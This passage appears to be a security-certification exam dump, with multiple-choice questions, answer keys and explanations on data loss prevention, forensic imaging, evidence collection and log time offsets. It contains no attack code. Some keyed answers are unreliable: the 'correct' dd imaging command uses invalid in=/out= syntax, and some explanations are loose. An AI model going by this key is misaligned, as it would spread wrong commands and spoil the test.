Answer: DExplanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, andnetworks) to make sure that key content is not deleted or removed. They also monitor who is usingthe data (looking for unauthorized access) and transmitting the data. This would address theconcerns of the auditors. |
|
|
Which of the following security strategies allows a company to limit damage to internal systemsand provides loss control?A. Restoration and recovery strategiesB. Deterrent strategiesC. Containment strategiesD. Detection strategies |
Answer: CExplanation: Containment strategies is used to limit damages, contain a loss so that it may be controlled, muchlike quarantine, and loss incident isolation. |
|
|
Matt, a security analyst, needs to implement encryption for company data and also prevent theft ofcompany data. Where and how should Matt meet this requirement?A. Matt should implement access control lists and turn on EFS.B. Matt should implement DLP and encrypt the company database.C. Matt should install Truecrypt and encrypt the company server.D. Matt should install TPMs and encrypt the company database. |
Answer: BExplanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, and networks) to make sure that key content is not deleted or removed. They also monitor who is usingthe data (looking for unauthorized access) and transmitting the data. Encryption is used to protectdata. |
|
|
An employee recently lost a USB drive containing confidential customer data. Which of thefollowing controls could be utilized to minimize the risk involved with the use of USB drives?A. DLPB. Asset trackingC. HSMD. Access control |
Answer: AExplanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, andnetworks) to make sure that key content is not deleted or removed. They also monitor who is usingthe data (looking for unauthorized access) and transmitting the data. |
|
|
Which of the following controls would prevent an employee from emailing unencrypted informationto their personal email account over the corporate network?A. DLPB. CRLC. TPMD. HSM |
Answer: AExplanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, andnetworks) to make sure that key content is not deleted or removed. They also monitor who is usingthe data (looking for unauthorized access) and transmitting the data |
|
|
Which of the following are Data Loss Prevention (DLP) strategies that address data in transitissues? (Select TWO).A. Scanning printing of documents.B. Scanning of outbound IM (Instance Messaging).C. Scanning copying of documents to USB.D. Scanning of SharePoint document library.E. Scanning of shared drives.F. Scanning of HTTP user traffic. |
Answer: B,FExplanation: DLP systems monitor the contents of systems (workstations, servers, networks) to make sure keycontent is not deleted or removed. They also monitor who is using the data (looking forunauthorized access) and transmitting the data. Outbound IM and HTTP user traffic refers to dataover a network which falls within the DLP strategy |
|
|
Which of the following assets is MOST likely considered for DLP?A. Application server contentB. USB mass storage devicesC. Reverse proxyD. Print server |
Answer: BExplanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, andnetworks) to make sure that key content is not deleted or removed. They also monitor who is usingthe data (looking for unauthorized access) and transmitting the data. A USB presents the mostlikely device to be used to steal data because of its physical size. |
|
|
The Chief Information Officer (CIO) is concerned with moving an application to a SaaS cloudprovider. Which of the following can be implemented to provide for data confidentiality assuranceduring and after the migration to the cloud? A. HPM technologyB. Full disk encryptionC. DLP policyD. TPM technology |
Answer: CExplanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, andnetworks) to make sure that key content is not deleted or removed. They also monitor who is usingthe data (looking for unauthorized access) and transmitting the data. The Software as a Service(SaaS) applications are remotely run over the Web and as such requires DLP monitoring |
|
|
Which of the following is a Data Loss Prevention (DLP) strategy and is MOST useful for securingdata in use?A. Email scanningB. Content discoveryC. Database fingerprintingD. Endpoint protection |
Answer: DExplanation: Data loss prevention (DLP) systems monitor the contents of systems (workstations, servers, andnetworks) to make sure that key content is not deleted or removed. They also monitor who is usingthe data (looking for unauthorized access) and transmitting the data. DLP systems sharecommonality with network intrusion prevention systems. Endpoint protection provides security andmanagement over both physical and virtual environments. |
|
|
A customer service department has a business need to send high volumes of confidentialinformation to customers electronically. All emails go through a DLP scanner. Which of thefollowing is the BEST solution to meet the business needs and protect confidential information?A. Automatically encrypt impacted outgoing emailsB. Automatically encrypt impacted incoming emailsC. Monitor impacted outgoing emailsD. Prevent impacted outgoing emails |
Answer: AExplanation: Encryption is done to protect confidentiality and integrity of data. It also provides authentication,nonrepudiation and access control to the data. Since all emails go through a DLP scanner and it isoutgoing main that requires protection then the best option is to put a system in place that willencrypt the outgoing emails automatically. |
|
|
Which of the following is a best practice when a mistake is made during a forensics examination?A. The examiner should verify the tools before, during, and after an examination.B. The examiner should attempt to hide the mistake during cross-examination.C. The examiner should document the mistake and workaround the problem.D. The examiner should disclose the mistake and assess another area of the disc. |
Answer: CExplanation: Every step in an incident response should be documented, including every action taken by endusers and the incident-response team. |
|
|
An incident response team member needs to perform a forensics examination but does not havethe required hardware. Which of the following will allow the team member to perform theexamination with minimal impact to the potential evidence?A. Using a software file recovery discB. Mounting the drive in read-only modeC. Imaging based on order of volatilityD. Hashing the image after capture |
Answer: BExplanation: Mounting the drive in read-only mode will prevent any executable commands from being executed.This is turn will have the least impact on potential evidence using the drive in question. |
|
|
Which of the following should Jane, a security administrator, perform before a hard drive isanalyzed with forensics tools?A. Identify user habitsB. Disconnect system from networkC. Capture system imageD. Interview witnesses |
Answer: CExplanation: Capturing an image of the operating system in its exploited state can be helpful in revisiting theissue after the fact to learn more about it. Very much as helpful in same way that a virus sample iskept in laboratories to study later after a breakout. Also you should act in the order of volatilitywhich states that the system image capture is first on the list of a forensic analysis. |
|
|
Computer evidence at a crime is preserved by making an exact copy of the hard disk. Which of thefollowing does this illustrate?A. Taking screenshotsB. System image captureC. Chain of custodyD. Order of volatility |
Answer: BExplanation: A system image would be a snapshot of what exists at the moment. Thus capturing an image ofthe operating system in its exploited state can be helpful in revisiting the issue after the fact tolearn more about it. |
|
|
To ensure proper evidence collection, which of the following steps should be performed FIRST?A. Take hashes from the live systemB. Review logsC. Capture the system imageD. Copy all compromised files |
Answer: CExplanation: Capturing an image of the operating system in its exploited state can be helpful in revisiting theissue after the fact to learn more about it. This is essential since the collection of evidence processmay result in some mishandling and changing the exploited state. |
|
|
A security administrator needs to image a large hard drive for forensic analysis. Which of thefollowing will allow for faster imaging to a second hard drive? A. cp /dev/sda /dev/sdb bs=8k B. tail -f /dev/sda > /dev/sdb bs=8k C. dd in=/dev/sda out=/dev/sdb bs=4k D. locate /dev/sda /dev/sdb bs=4k |
Answer: CExplanation: dd is a command-line utility for Unix and Unix-like operating systems whose primary purpose is toconvert and copy files. dd can duplicate data across files, devices, partitions and volumesOn Unix, device drivers for hardware (such as hard disks) and special device files (such as/dev/zero and /dev/random) appear in the file system just like normal files; dd can also read and/orwrite from/to these files, provided that function is implemented in their respective driver. As aresult, dd can be used for tasks such as backing up the boot sector of a hard drive, and obtaininga fixed amount of random data. The dd program can also perform conversions on the data as it iscopied, including byte order swapping and conversion to and from the ASCII and EBCDIC textencodings.An attempt to copy the entire disk using cp may omit the final block if it is of an unexpected length;whereas dd may succeed. The source and destination disks should have the same size. |
|
|
A security technician wishes to gather and analyze all Web traffic during a particular time period.Which of the following represents the BEST approach to gathering the required data?A. Configure a VPN concentrator to log all traffic destined for ports 80 and 443.B. Configure a proxy server to log all traffic destined for ports 80 and 443.C. Configure a switch to log all traffic destined for ports 80 and 443.D. Configure a NIDS to log all traffic destined for ports 80 and 443 |
Answer: BExplanation: A proxy server is in essence a device that acts on behalf of others and in security terms all internaluser interaction with the Internet should be controlled through a proxy server. This makes a proxyserver the best tool to gather the required data |
|
|
A forensic analyst is reviewing electronic evidence after a robbery. Security cameras installed atthe site were facing the wrong direction to capture the incident. The analyst ensures the camerasare turned to face the proper direction. Which of the following types of controls is being used?A. DetectiveB. DeterrentC. CorrectiveD. Preventive |
Answer: CExplanation: A corrective control would be any corrective action taken to correct any existing control that werefaulty or wrongly installed – as in this case the cameras were already there, it just had to beadjusted to perform its function as intended. |
|
|
Joe, a security administrator, is concerned with users tailgating into the restricted areas. Given alimited budget, which of the following would BEST assist Joe with detecting this activity?A. Place a full-time guard at the entrance to confirm user identity.B. Install a camera and DVR at the entrance to monitor access. C. Revoke all proximity badge access to make users justify access.D. Install a motion detector near the entrance. |
Answer: BExplanation: Tailgating is a favorite method of gaining entry to electronically locked systems by followingsomeone through the door they just unlocked. With a limited budget installing a camera and DVRat the entrance to monitor access to the restricted areas is the most feasible solution. The benefitof a camera (also known as closed-circuit television, or CCTV) is that it is always running and canrecord everything it sees, creating evidence that can be admissible in court if necessary. |
|
|
The incident response team has received the following email message.From: monitor@ext-company.com To: security@company.com Subject: Copyright infringement A copyright infringement alert was triggered by IP address 13.10.66.5 at 09: 50: 01 GMT. After reviewing the following web logs for IP 13.10.66.5, the team is unable to correlate andidentify the incident. 09: 45: 33 13.10.66.5 http: //remote.site.com/login.asp?user=john 09: 50: 22 13.10.66.5 http: //remote.site.com/logout.asp?user=anne 10: 50: 01 13.10.66.5 http: //remote.site.com/access.asp?file=movie.mov 11: 02: 45 13.10.65.5 http: //remote.site.com/download.asp?movie.mov=ok Which of the following is the MOST likely reason why the incident response team is unable toidentify and correlate the incident? A. The logs are corrupt and no longer forensically sound. B. Traffic logs for the incident are unavailable.C. Chain of custody was not properly maintained. D. Incident time offsets were not accounted for. |
Answer: D Explanation: It is quite common for workstation times to be off slightly from actual time, and that can happenwith servers as well. Since a forensic investigation is usually dependent on a step-by-step accountof what has happened, being able to follow events in the correct time sequence is critical. Becauseof this, it is imperative to record the time offset on each affected machine during the investigation.One method of assisting with this is to add an entry to a log file and note the time that this wasdone and the time associated with it on the system. |
|
|
A system administrator is responding to a legal order to turn over all logs from all companyservers. The system administrator records the system time of all servers to ensure that:A. HDD hashes are accurate.B. the NTP server works properly.C. chain of custody is preserved.D. time offset can be calculated |
Answer: DExplanation: It is quite common for workstation times to be off slightly from actual time, and that can happenwith servers as well. Since a forensic investigation is usually dependent on a step-by-step accountof what has happened, being able to follow events in the correct time sequence is critical. Becauseof this, it is imperative to record the time offset on each affected machine during the investigation.One method of assisting with this is to add an entry to a log file and note the time that this wasdone and the time associated with it on the system. |
|
|
A recent intrusion has resulted in the need to perform incident response procedures. The incidentresponse team has identified audit logs throughout the network and organizational systems whichhold details of the security breach. Prior to this incident, a security consultant informed thecompany that they needed to implement an NTP server on the network. Which of the following is aproblem that the incident response team will likely encounter during their assessment?A. Chain of custodyB. Tracking man hoursC. Record time offsetD. Capture video traffic
|
Answer: CExplanation: It is quite common for workstation as well as server times to be off slightly from actual time. Sincea forensic investigation is usually dependent on a step-by-step account of what has happened,being able to follow events in the correct time sequence is critical. Because of this, it is imperativeto record the time offset on each affected machine during the investigation. One method ofassisting with this is to add an entry to a log file and note the time that this was done and the timeassociated with it on the system. There is no mention that this was done by the incident responseteam. |
